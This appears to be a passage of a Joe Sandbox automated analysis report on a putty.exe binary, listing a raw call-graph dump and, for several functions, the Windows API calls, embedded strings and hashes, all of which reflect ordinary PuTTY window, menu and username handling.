4469dd 55788->55793 55794 4469c9 GetProcAddress 55788->55794 55797 446a3d 55789->55797 55798 446a29 GetProcAddress 55789->55798 55795 446991 55790->55795 55796 44697d GetProcAddress 55790->55796 55791->55790 55792 446921 55792->55780 55793->55795 55799 4469e7 GetProcAddress 55793->55799 55794->55793 55795->55789 55800 446a05 GetProcAddress 55795->55800 55796->55795 55801 446a47 GetProcAddress 55797->55801 55802 446a5b 55797->55802 55798->55797 55799->55795 55800->55789 55801->55802 55803 446a65 GetProcAddress 55802->55803 55804 446a79 55802->55804 55803->55804 55805 446a97 55804->55805 55806 446a83 GetProcAddress 55804->55806 55807 446ab5 55805->55807 55808 446aa1 GetProcAddress 55805->55808 55806->55805 55809 446ad3 55807->55809 55810 446abf GetProcAddress 55807->55810 55808->55807 55811 446af1 55809->55811 55812 446add GetProcAddress 55809->55812 55810->55809 55813 446b0f 55811->55813 55814 446afb GetProcAddress 55811->55814 55812->55811 55815 446b2d 55813->55815 55816 446b19 GetProcAddress 55813->55816 55814->55813 55817 446b37 GetProcAddress 55815->55817 55818 446b4b 55815->55818 55816->55815 55817->55818 55819 446b55 GetProcAddress 55818->55819 55820 446b69 55818->55820 55819->55820 55821 446b87 55820->55821 55822 446b73 GetProcAddress 55820->55822 55823 446ba5 55821->55823 55824 446b91 GetProcAddress 55821->55824 55822->55821 55825 446bc3 55823->55825 55826 446baf GetProcAddress 55823->55826 55824->55823 55827 446be1 55825->55827 55828 446bcd GetProcAddress 55825->55828 55826->55825 55829 446bff 55827->55829 55830 446beb GetProcAddress 55827->55830 55828->55827 55831 446c1d 55829->55831 55832 446c09 GetProcAddress 55829->55832 55830->55829 55833 446c27 GetProcAddress 55831->55833 55834 446c3b 55831->55834 55832->55831 55833->55834 55835 446c45 GetProcAddress 55834->55835 55836 446c59 55834->55836 55835->55836 55837 446c77 55836->55837 55838 446c63 GetProcAddress 55836->55838 55839 446c95 55837->55839 55840 446c81 GetProcAddress 55837->55840 55838->55837 55841 446cb3 55839->55841 55842 446c9f GetProcAddress 55839->55842 55840->55839 55843 446cd1 55841->55843 55844 446cbd GetProcAddress 55841->55844 55842->55841 55845 446cef 55843->55845 55846 446cdb GetProcAddress 55843->55846 55844->55843 55847 446d0d 55845->55847 55848 446cf9 GetProcAddress 55845->55848 55846->55845 55849 446d17 GetProcAddress 55847->55849 55850 446d2b 55847->55850 55848->55847 55849->55850 55851 446d35 GetProcAddress 55850->55851 55852 446d49 55850->55852 55851->55852 55853 446d67 55852->55853 55854 446d53 GetProcAddress 55852->55854 55855 446d80 55853->55855 55856 446d71 GetProcAddress 55853->55856 55854->55853 55866 4468bb WSAStartup 55855->55866 55856->55855 55859 446dbe 55860 4468bb WSAStartup 55861 446d9f 55860->55861 55861->55859 55862 4468bb WSAStartup 55861->55862 55863 446dae 55862->55863 55863->55859 55868 441074 92 API calls _wctomb_s 55863->55868 55865->55792 55867 4468d6 55866->55867 55867->55859 55867->55860 55868->55859 55869 43a67c 80 API calls 2 library calls 55770 451aa1 HeapCreate 55771 451ac1 55770->55771 55772 451aeb 55770->55772 55773 451ad0 55771->55773 55774 451aee 55771->55774 55778 451af2 HeapAlloc 55773->55778 55776 451ada 55776->55774 55777 451adf HeapDestroy 55776->55777 55777->55772 55778->55776 55870 4464bd 55871 4464bf 55870->55871 55877 40b40a 55871->55877 55873 4464dc GetSystemDirectoryA 55873->55871 55874 4464f0 55873->55874 55875 446506 LoadLibraryA 55874->55875 55876 44651a 55875->55876 55878 40b429 55877->55878 55884 40b425 _strcat 55877->55884 55879 40b434 55878->55879 55880 40b43b 55878->55880 55885 44e235 55879->55885 55888 44e247 13 API calls 3 library calls 55880->55888 55883 40b443 55883->55884 55884->55873 55889 44e209 55885->55889 55888->55883 55890 44e232 55889->55890 55892 44e210 __getbuf 55889->55892 55890->55884 55892->55890 55893 44e1c3 55892->55893 55894 44e1df 55893->55894 55895 44e1d1 55893->55895 55897 44e1f8 RtlAllocateHeap 55894->55897 55898 44e207 55894->55898 55895->55894 55899 452319 5 API calls __getbuf 55895->55899 55897->55898 55898->55892 55899->55894 55900 43c92a 55901 43ce52 55900->55901 55902 43c942 55900->55902 55905 43ce58 55901->55905 55925 43c9c0 55901->55925 55903 43ce3b 55902->55903 55904 43c94b 55902->55904 55989 445d6e WinHelpA 55903->55989 55906 43cd16 55904->55906 55907 43c954 55904->55907 55991 43c30b GetWindowPlacement SetWindowPlacement 55905->55991 55917 43cd32 SendMessageA SendMessageA SendMessageA 55906->55917 55906->55925 55910 43c95d 55907->55910 55911 43ccec 55907->55911 55913 43c9fb 55910->55913 55914 43c969 55910->55914 55986 43ae7a 43 API calls 55911->55986 55912 43ce43 55990 43c7d5 SetWindowLongA SetWindowLongA 55912->55990 55960 43c891 55913->55960 55919 43c971 GetWindowLongA 55914->55919 55920 43c9cd ReleaseCapture 55914->55920 55944 43cd89 55917->55944 55924 43c981 55919->55924 55919->55925 55922 43c9e1 55920->55922 55920->55925 55921 43ccff 55921->55925 55926 43cd0a MessageBeep 55921->55926 55983 43c7d5 SetWindowLongA SetWindowLongA 55922->55983 55981 43ba8e 97 API calls 3 library calls 55924->55981 55926->55925 55928 43ca30 55932 43ca34 GetWindowLongA SetWindowLongA 55928->55932 55933 43ca4a GetDlgItem 55928->55933 55930 43c992 55930->55925 55934 43c9a1 GetCapture 55930->55934 55931 43cdfe 55935 43c891 83 API calls 55931->55935 55938 43ca61 LoadIconA SendMessageA GetDesktopWindow GetWindowRect 55932->55938 55933->55938 55939 43ca5a DestroyWindow 55933->55939 55934->55925 55940 43c9ac 55934->55940 55941 43ce09 55935->55941 55936 43cd98 GetDlgItem 55942 43cdaf DestroyWindow 55936->55942 55936->55944 55946 43cae4 8 API calls 55938->55946 55947 43ca9a GetWindowRect 55938->55947 55939->55938 55982 43c7d5 SetWindowLongA SetWindowLongA 55940->55982 55974 43b6ad 55941->55974 55942->55944 55944->55931 55944->55936 55987 43a3ef 64 API calls _wctomb_s 55944->55987 55988 43a517 38 API calls _wctomb_s 55944->55988 55958 43cbdb ___initmbctable _strrchr 55946->55958 55947->55946 55950 43caa7 MoveWindow 55947->55950 55950->55946 55951 43cca1 SendMessageA 55954 43ccb8 55951->55954 55952 43ccca SetWindowLongA 55952->55925 55954->55952 55985 43b605 41 API calls 55954->55985 55956 43cc3c 55956->55958 55984 44c558 38 API calls 6 library calls 55956->55984 55958->55951 55958->55956 55969 43c7f9 55958->55969 55961 43c8c1 55960->55961 55962 43c8a1 55960->55962 56023 439100 SendMessageA GetClientRect MapDialogRect 55961->56023 56022 439100 SendMessageA GetClientRect MapDialogRect 55962->56022 55965 43c8b3 55968 43c8dc 55965->55968 55966 43c926 SetWindowTextA SetWindowLongA 55966->55928 55968->55966 55992 43a59a 55968->55992 55970 43c809 _strlen 55969->55970 55971 43c830 SendMessageA 55970->55971 55972 43c857 SendMessageA 55971->55972 55973 43c86d 55971->55973 55972->55973 55973->55958 55975 43b709 SendMessageA InvalidateRect SetFocus 55974->55975 55976 43b6bb 55974->55976 55975->55925 55976->55975 56089 43b152 55976->56089 56097 402ddc 55976->56097 56117 43b058 55976->56117 56124 402e77 55976->56124 55981->55930 55982->55925 55983->55925 55984->55956 55985->55952 55986->55921 55987->55944 55988->55944 55989->55912 55990->55925 55991->55925 55993 43a5ee ___initmbctable 55992->55993 55994 43a5b8 ___initmbctable 55992->55994 56021 43a64f ___initmbctable _wctomb_s 55993->56021 56024 43a4ba 55993->56024 55994->55993 55997 43a4ba 38 API calls 55994->55997 55995 43addb 55999 43ae21 55995->55999 56061 439239 55995->56061 55997->55993 55998 44c558 38 API calls _wctomb_s 56019 43a6af 55998->56019 55999->55968 56004 43a32e 49 API calls 56004->56021 56017 43a4ba 38 API calls 56017->56021 56019->55998 56019->56021 56065 43956b 46 API calls 4 library calls 56019->56065 56066 43a32e 56019->56066 56072 43971c MapDialogRect CreateWindowExA SendMessageA SetWindowPos 56019->56072 56020 43ac51 SendDlgItemMessageA 56020->56021 56021->55995 56021->56004 56021->56017 56021->56019 56021->56020 56037 4392a5 56021->56037 56043 4393e2 56021->56043 56049 43987a 56021->56049 56055 439c11 56021->56055 56073 439349 MapDialogRect CreateWindowExA SendMessageA SetWindowPos 56021->56073 56074 439aae MapDialogRect CreateWindowExA SendMessageA SetWindowPos 56021->56074 56075 439515 MapDialogRect CreateWindowExA SendMessageA SetWindowPos 56021->56075 56076 439dc8 MapDialogRect CreateWindowExA SendMessageA SetWindowPos #13 56021->56076 56077 439b6b MapDialogRect CreateWindowExA SendMessageA SetWindowPos 56021->56077 56078 4399f1 MapDialogRect CreateWindowExA SendMessageA SetWindowPos 56021->56078 56079 43a3a0 64 API calls _wctomb_s 56021->56079 56022->55965 56023->55965 56025 43a4f1 56024->56025 56026 43a4d0 56024->56026 56028 43a513 56025->56028 56029 43a504 56025->56029 56026->56025 56027 43a4e2 56026->56027 56080 44c558 38 API calls 6 library calls 56027->56080 56034 439775 56028->56034 56081 44c558 38 API calls 6 library calls 56029->56081 56032 43a510 56032->56028 56033 43a4ee 56033->56025 56082 439176 MapDialogRect 56034->56082 56038 4392c4 56037->56038 56039 4392f5 56037->56039 56040 439176 4 API calls 56038->56040 56041 439176 4 API calls 56039->56041 56040->56039 56042 43933d 56041->56042 56042->56021 56044 4393f0 56043->56044 56047 439434 56043->56047 56045 439176 4 API calls 56044->56045 56045->56047 56046 439508 56046->56021 56047->56046 56048 439176 4 API calls 56047->56048 56048->56047 56050 4398a7 56049->56050 56051 4398bd 56049->56051 56050->56051 56053 4398ad SendMessageA 56050->56053 56052 439176 4 API calls 56051->56052 56054 4398e9 56052->56054 56053->56051 56054->56021 56056 439c23 56055->56056 56057 439c67 56055->56057 56058 439176 4 API calls 56056->56058 56059 439176 4 API calls 56057->56059 56058->56057 56060 439cc5 56059->56060 56060->56021 56062 439272 56061->56062 56063 439176 4 API calls 56062->56063 56064 439299 56063->56064 56064->55999 56065->56019 56067 43a395 56066->56067 56068 43a339 _strlen 56066->56068 56067->56019 56087 44dc1f 49 API calls ___initmbctable 56068->56087 56070 43a35d 56070->56067 56088 44dc1f 49 API calls ___initmbctable 56070->56088 56072->56019 56073->56021 56074->56021 56075->56021 56076->56021 56077->56021 56078->56021 56079->56021 56080->56033 56081->56032 56083 439196 CreateWindowExA SendMessageA 56082->56083 56084 4391fa 56082->56084 56085 4391dd _wctomb_s 56083->56085 56084->56021 56085->56084 56086 4391e3 SetWindowPos 56085->56086 56086->56084 56087->56070 56088->56070 56151 43aec9 56089->56151 56092 43b17c 56155 44c558 38 API calls 6 library calls 56092->56155 56093 43b193 SendDlgItemMessageA 56093->55976 56095 43b190 56095->56093 56098 402e35 56097->56098 56099 402de5 56097->56099 56100 402e6a 56098->56100 56187 43b0a0 42 API calls _wctomb_s 56098->56187 56157 402036 56099->56157 56100->55976 56104 402e47 56107 402036 38 API calls 56104->56107 56105 402e21 56171 43b41c 56105->56171 56106 402df6 56108 43b41c 65 API calls 56106->56108 56110 402e53 56107->56110 56111 402e06 56108->56111 56188 402564 56110->56188 56186 40213a 38 API calls _wctomb_s 56111->56186 56114 402e10 56115 43b058 39 API calls 56114->56115 56116 402e1c 56115->56116 56116->55976 56118 43aec9 38 API calls 56117->56118 56119 43b067 56118->56119 56120 43b075 56119->56120 56121 43b08c SetDlgItemTextA 56119->56121 56227 44c558 38 API calls 6 library calls 56120->56227 56121->55976 56123 43b089 56123->56121 56125 402e88 56124->56125 56126 402f19 56124->56126 56127 402036 38 API calls 56125->56127 56148 402f14 56126->56148 56233 43b0a0 42 API calls _wctomb_s 56126->56233 56128 402e93 56127->56128 56130 402ec6 56128->56130 56131 402e9a 56128->56131 56133 43b41c 65 API calls 56130->56133 56132 43b41c 65 API calls 56131->56132 56134 402eaa 56132->56134 56135 402ed6 56133->56135 56138 402036 38 API calls 56134->56138 56136 402036 38 API calls 56135->56136 56139 402ede 56136->56139 56137 402f2b 56141 402036 38 API calls 56137->56141 56140 402eb2 56138->56140 56143 402036 38 API calls 56139->56143 56149 402ec1 56139->56149 56228 44cd68 56140->56228 56144 402f45 56141->56144 56145 402eed 56143->56145 56234 40248b 56144->56234 56147 44cd68 32 API calls 56145->56147 56146 43b058 39 API calls 56146->56148 56147->56149 56148->55976 56149->56146 56152 43aeef 56151->56152 56154 43aed2 56151->56154 56152->56092 56152->56093 56154->56152 56156 43a555 38 API calls 56154->56156 56155->56095 56156->56154 56158 402062 56157->56158 56159 40204f 56157->56159 56161 40207f 56158->56161 56162 40205f 56158->56162 56202 44c558 38 API calls 6 library calls 56159->56202 56199 437de8 56161->56199 56162->56158 56203 44c558 38 API calls 6 library calls 56162->56203 56165 40207c 56165->56161 56167 40209b 56204 44c558 38 API calls 6 library calls 56167->56204 56168 4020ae 56168->56105 56168->56106 56170 4020ab 56170->56168 56172 43aec9 38 API calls 56171->56172 56173 43b42e 56172->56173 56174 43b43a 56173->56174 56175 43b44d 56173->56175 56213 44c558 38 API calls 6 library calls 56174->56213 56177 43b47c 56175->56177 56183 43b467 56175->56183 56179 43a32e 49 API calls 56177->56179 56178 43b44a 56178->56175 56180 43b490 56179->56180 56181 43b49a SetDlgItemTextA 56180->56181 56182 43b4ad 56180->56182 56181->56182 56182->56111 56214 44c558 38 API calls 6 library calls 56183->56214 56185 43b477 56185->56182 56186->56114 56187->56104 56189 402570 56188->56189 56190 402587 56189->56190 56191 40259a 56189->56191 56223 44c558 38 API calls 6 library calls 56190->56223 56193 402597 56191->56193 56194 4025b7 56191->56194 56193->56191 56224 44c558 38 API calls 6 library calls 56193->56224 56215 401f16 56194->56215 56196 4025b4 56196->56194 56205 437cca 56199->56205 56201 402092 56201->56167 56201->56168 56202->56162 56203->56165 56204->56170 56206 437cdb 56205->56206 56207 437cdf 56205->56207 56206->56201 56208 437d0a 56207->56208 56211 437d23 _wctomb_s 56207->56211 56212 44c558 38 API calls 6 library calls 56208->56212 56210 437d1e 56210->56211 56211->56201 56212->56210 56213->56178 56214->56185 56216 401f1f 56215->56216 56217 401f5e 56216->56217 56225 4382cd 38 API calls _wctomb_s 56216->56225 56217->56100 56219 401f33 56219->56217 56220 401f47 56219->56220 56226 44c558 38 API calls 6 library calls 56220->56226 56222 401f5b 56222->56217 56223->56193 56224->56196 56225->56219 56226->56222 56227->56123 56245 44fe3f 56228->56245 56231 44cda5 56231->56149 56233->56137 56235 402497 56234->56235 56236 4024c1 56235->56236 56237 4024ae 56235->56237 56238 4024be 56236->56238 56239 4024de 56236->56239 56265 44c558 38 API calls 6 library calls 56237->56265 56238->56236 56266 44c558 38 API calls 6 library calls 56238->56266 56242 401f16 38 API calls 56239->56242 56244 4024f0 56242->56244 56243 4024db 56243->56239 56244->56148 56246 450600 56245->56246 56253 44fe76 __aulldvrm _strlen 56245->56253 56257 44fbf6 56246->56257 56249 44fdb1 27 API calls _write_multi_char 56249->56253 56250 44e235 __getbuf 6 API calls 56250->56253 56251 455474 WideCharToMultiByte _wctomb_s 56251->56253 56253->56246 56253->56249 56253->56250 56253->56251 56254 44fde4 27 API calls _write_multi_char 56253->56254 56255 44fe08 27 API calls _wctomb_s 56253->56255 56263 44e3a9 HeapFree VirtualFree VirtualFree HeapFree _wctomb_s 56253->56263 56254->56253 56255->56253 56256 44fc9b 27 API calls 2 library calls 56256->56231 56258 44cd97 56257->56258 56259 44fbc5 ___initmbctable 56257->56259 56258->56231 56258->56256 56264 454a54 12 API calls 5 library calls 56259->56264 56263->56253 56265->56238 56266->56243

                            Executed Functions

                            Function 0044675D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3235 44675d-44676c 3236 4467a0-4467a7 3235->3236 3237 44676e-44677b call 4464b2 3235->3237 3238 4467f4-446806 GetUserNameA 3236->3238 3239 4467a9-4467b0 3236->3239 3246 446790 3237->3246 3247 44677d-44678e GetProcAddress 3237->3247 3241 44680f-446828 call 40b3b0 GetUserNameA 3238->3241 3242 446808 3238->3242 3245 4467b5-4467d5 call 40b3b0 3239->3245 3251 446831-44683d 3241->3251 3252 44682a-446830 call 40b470 3241->3252 3242->3241 3257 4467d7-4467e3 call 44c410 3245->3257 3258 4467e9-4467ef call 40b470 3245->3258 3250 446796 3246->3250 3247->3250 3250->3236 3252->3251 3263 4467e5-4467e7 3257->3263 3264 4467f0-4467f2 3257->3264 3258->3264 3263->3264 3264->3238 3264->3251
                            APIs
                            • GetProcAddress.KERNELBASE(00000000,GetUserNameExA), ref: 00446783
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 00446802
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 00446822
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: NameUser$AddressProc
                            • String ID: GetUserNameExA$secur32.dll
                            • API String ID: 9235790-1467407615
                            • Opcode ID: 1ca44e35f902d35c238435ac5a6744272573cb08aeb1073fe096aa8417d1272b
                            • Instruction ID: 51b71fb90d7319dcf99ef60c9596c9b22611e8f2946cd3f1b10b4fbae7343758
                            • Opcode Fuzzy Hash: 1ca44e35f902d35c238435ac5a6744272573cb08aeb1073fe096aa8417d1272b
                            • Instruction Fuzzy Hash: 2021DBB2501214BEEB14AF659DC1E7F77E8D741718F22003FF600E6281DA795D84976E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044421E Relevance: 153.2, APIs: 53, Strings: 34, Instructions: 952windowfileregistryCOMMON
                            Download Yara Rule
                            APIs
                            • #17.COMCTL32 ref: 0044421E
                              • Part of subcall function 0043CEAE: CreateDialogParamA.USER32(0000006F,00000000,Function_0003C7F4,00000000), ref: 0043CEC0
                              • Part of subcall function 0043CEAE: ShowWindow.USER32(00000000,00000000), ref: 0043CECB
                              • Part of subcall function 0043CEAE: SetActiveWindow.USER32(00000000), ref: 0043CED2
                              • Part of subcall function 0043CEAE: KiUserCallbackDispatcher.NTDLL(00000000), ref: 0043CED9
                              • Part of subcall function 00446489: GetVersionExA.KERNEL32(00477440), ref: 004464AA
                            • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 0044426D
                            • GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00444292
                            • CoInitialize.OLE32 ref: 004442B0
                            • MessageBoxA.USER32(?,Failed to initialize COM subsystem,00000000,00000030), ref: 004442DC
                            • _strlen.LIBCMT ref: 0044437D
                            • _strspn.LIBCMT ref: 00444449
                            • _strrchr.LIBCMT ref: 0044445D
                            • MapViewOfFile.KERNEL32(?,00000004,?,?,?), ref: 004444D9
                            • UnmapViewOfFile.KERNEL32(00000000,?,?,?), ref: 004444FC
                            • CloseHandle.KERNEL32(?,?,?,?), ref: 00444505
                            • LoadIconA.USER32(?,000000C8), ref: 004447FD
                            • LoadCursorA.USER32(?,00007F01), ref: 0044480C
                            • RegisterClassA.USER32(PuTTY), ref: 00444827
                            • CreateWindowExA.USER32(?,PuTTY,PuTTY,?,80000000,80000000,-00474DC0,?,?,?,?), ref: 0044495A
                            • GetWindowRect.USER32(?), ref: 004449E4
                            • GetClientRect.USER32(?), ref: 004449F4
                            • SetWindowPos.USER32(?,?,?,?,?,0000000E), ref: 00444A6E
                            • CreateBitmap.GDI32(00000001,00000001,00000000), ref: 00444AB3
                            • CreateCaret.USER32(?,?,?,?), ref: 00444ADD
                            • SetScrollInfo.USER32(00000001,0000001C), ref: 00444B19
                            • GetDoubleClickTime.USER32(?,?,?,?,?,?,0000000E), ref: 00444B2B
                            • GetSystemMenu.USER32(?,?,?,?,?,?,?,0000000E), ref: 00444B3D
                            • CreatePopupMenu.USER32 ref: 00444B48
                            • AppendMenuA.USER32(00000000,?,00000190,&Paste), ref: 00444B65
                            • CreateMenu.USER32 ref: 00444B67
                            • AppendMenuA.USER32(?,00000800), ref: 00444B9D
                            • AppendMenuA.USER32(?,?,00000010,&Event Log), ref: 00444BAA
                            • AppendMenuA.USER32(?,00000800), ref: 00444BB2
                            • AppendMenuA.USER32(?,?,00000020,Ne&w Session...), ref: 00444BBF
                            • AppendMenuA.USER32(?,?,00000030,&Duplicate Session), ref: 00444BCC
                            • AppendMenuA.USER32(?,00000010,Sa&ved Sessions), ref: 00444BDE
                            • AppendMenuA.USER32(?,?,00000050,Chan&ge Settings...), ref: 00444BEB
                            • AppendMenuA.USER32(?,00000800), ref: 00444BF3
                            • AppendMenuA.USER32(?,?,00000170,C&opy All to Clipboard), ref: 00444C03
                            • AppendMenuA.USER32(?,?,00000060,C&lear Scrollback), ref: 00444C10
                            • AppendMenuA.USER32(?,?,00000070,Rese&t Terminal), ref: 00444C1D
                            • AppendMenuA.USER32(?,00000800), ref: 00444C25
                            • AppendMenuA.USER32(?,00000000,&Full Screen), ref: 00444C4A
                            • AppendMenuA.USER32(?,00000800), ref: 00444C52
                            • AppendMenuA.USER32(?,?,00000140,&Help), ref: 00444C6B
                            • AppendMenuA.USER32(?,?,00000150,00000000), ref: 00444C8C
                            • GetKeyboardLayout.USER32 ref: 00444CAB
                            • ShowWindow.USER32(?,?,?,00000150,00000000,?,?,?,?,00000070,Rese&t Terminal,?,00000060,C&lear Scrollback,?,00000170), ref: 00444CC1
                            • SetForegroundWindow.USER32 ref: 00444CCD
                            • GetForegroundWindow.USER32(?,?,00000150,00000000,?,?,?,?,00000070,Rese&t Terminal,?,00000060,C&lear Scrollback,?,00000170,C&opy All to Clipboard), ref: 00444CE4
                            • UpdateWindow.USER32 ref: 00444D09
                            • MsgWaitForMultipleObjects.USER32(?,00000000,?,000000FF,000000FF), ref: 00444D2D
                            • IsWindow.USER32 ref: 00444D62
                            • IsDialogMessageA.USER32(?,?,?,?,00000001,?,000000FF,000000FF,?,00000150,00000000,?,?,?,?,00000070), ref: 00444D76
                            • DispatchMessageA.USER32(?), ref: 00444D84
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            • PeekMessageA.USER32(?,?,?,?,00000001), ref: 00444DAC
                            • GetForegroundWindow.USER32(?,?,?,00000001,?,?,00000001,?,000000FF,000000FF,?,00000150,00000000), ref: 00444DB2
                            Strings
                            • MSWHEEL_ROLLMSG, xrefs: 00444268
                            • &Help, xrefs: 00444C5D
                            • -pgpfp, xrefs: 004445B3
                            • This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?, xrefs: 0044475E
                            • tE, xrefs: 00444815, 00444950
                            • &About %s, xrefs: 00444C73
                            • Ne&w Session..., xrefs: 00444BB4
                            • ..\windows\window.c, xrefs: 004445FC
                            • Remove saved sessions and random seed file?If you hit Yes, ALL Registry entries associatedwith %s will be removed, as well as therandom seed file. THIS PROCESS WILLDESTROY YOUR SAVED SESSIONS.(This only affects the currently logged-in user.)If you hit , xrefs: 00444747
                            • &Duplicate Session, xrefs: 00444BC1
                            • %s Warning, xrefs: 0044476E
                            • Chan&ge Settings..., xrefs: 00444BE0
                            • option "%s" requires an argument, xrefs: 00444566
                            • Rese&t Terminal, xrefs: 00444C12
                            • &Paste, xrefs: 00444B54
                            • telnet:, xrefs: 00444615
                            • C&lear Scrollback, xrefs: 00444C05
                            • Sa&ved Sessions, xrefs: 00444BCE
                            • Failed to initialize COM subsystem, xrefs: 004442D6
                            • %s Fatal Error, xrefs: 00444238, 004442C5
                            • &Event Log, xrefs: 00444B9F
                            • FlashWindowEx, xrefs: 0044428C
                            • %s Uninstallation, xrefs: 00444757
                            • QG, xrefs: 00444833
                            • -cleanup-during-uninstall, xrefs: 0044459E, 00444730
                            • ret == 2, xrefs: 00444601
                            • PuTTY, xrefs: 00444820, 00444955, 00444956
                            • user32.dll, xrefs: 0044427D
                            • -cleanup, xrefs: 00444589
                            • &Full Screen, xrefs: 00444C27
                            • C&opy All to Clipboard, xrefs: 00444BF5
                            • %p:%u, xrefs: 004444B7
                            • unknown option "%s", xrefs: 00444704
                            • Windows refuses to report a version, xrefs: 00444249
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Menu$Append$Window$Create$_strlen$Message$FileForeground$DialogLoadRectRegisterShowView_strcat$ActiveAddressBitmapCallbackCaretClassClickClientClipboardCloseCursorDispatchDispatcherDoubleFormatHandleIconInfoInitializeKeyboardLayoutModuleMultipleNameObjectsParamPeekPopupProcScrollSystemTimeUnmapUpdateUserVersionWait_strncpy_strrchr_strspn
                            • String ID: QG$%p:%u$%s Fatal Error$%s Uninstallation$%s Warning$&About %s$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$-cleanup$-cleanup-during-uninstall$-pgpfp$..\windows\window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Failed to initialize COM subsystem$FlashWindowEx$MSWHEEL_ROLLMSG$Ne&w Session...$PuTTY$Remove saved sessions and random seed file?If you hit Yes, ALL Registry entries associatedwith %s will be removed, as well as therandom seed file. THIS PROCESS WILLDESTROY YOUR SAVED SESSIONS.(This only affects the currently logged-in user.)If you hit $Rese&t Terminal$Sa&ved Sessions$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$Windows refuses to report a version$option "%s" requires an argument$ret == 2$telnet:$unknown option "%s"$user32.dll$tE
                            • API String ID: 121397198-1735199403
                            • Opcode ID: adb9dfa74cc03708bf7dfd2251689837a051042d0549525623af1c15962badec
                            • Instruction ID: 5ba530037648658747e054a57dc0525cb4e48bdcb3ed0a685d322f78efb5b505
                            • Opcode Fuzzy Hash: adb9dfa74cc03708bf7dfd2251689837a051042d0549525623af1c15962badec
                            • Instruction Fuzzy Hash: 3E62E371504344BFFB21AF21EC46B6A3FA9FB45319F20403BF944962A2DB799881CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043C92A Relevance: 82.7, APIs: 35, Strings: 12, Instructions: 444windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2720 43c92a-43c93c 2721 43ce52-43ce56 2720->2721 2722 43c942-43c945 2720->2722 2725 43ce61 2721->2725 2726 43ce58-43ce5b call 43c30b 2721->2726 2723 43ce3b-43ce50 call 445d6e call 43c7d5 2722->2723 2724 43c94b-43c94e 2722->2724 2723->2725 2727 43cd16-43cd1c 2724->2727 2728 43c954-43c957 2724->2728 2731 43ce63-43ce67 2725->2731 2736 43ce60 2726->2736 2727->2725 2735 43cd22-43cd2c 2727->2735 2732 43c95d-43c963 2728->2732 2733 43ccec-43cd04 call 43ae7a 2728->2733 2737 43c9fb-43ca32 call 43c891 SetWindowTextA SetWindowLongA call 445c6f 2732->2737 2738 43c969-43c96f 2732->2738 2733->2725 2752 43cd0a-43cd11 MessageBeep 2733->2752 2735->2725 2741 43cd32-43cd8b SendMessageA * 3 call 43a587 2735->2741 2736->2725 2764 43ca34-43ca48 GetWindowLongA SetWindowLongA 2737->2764 2765 43ca4a-43ca58 GetDlgItem 2737->2765 2743 43c971-43c97f GetWindowLongA 2738->2743 2744 43c9cd-43c9db ReleaseCapture 2738->2744 2757 43cdf7-43cdfc 2741->2757 2750 43c981-43c99f call 43ba8e 2743->2750 2751 43c9c4 2743->2751 2744->2725 2748 43c9e1-43c9f6 call 43c7d5 2744->2748 2748->2736 2758 43c9c6-43c9c8 2750->2758 2766 43c9a1-43c9aa GetCapture 2750->2766 2751->2758 2752->2725 2762 43cdfe-43ce39 call 43c891 call 43b6ad SendMessageA InvalidateRect SetFocus 2757->2762 2763 43cd8d-43cd96 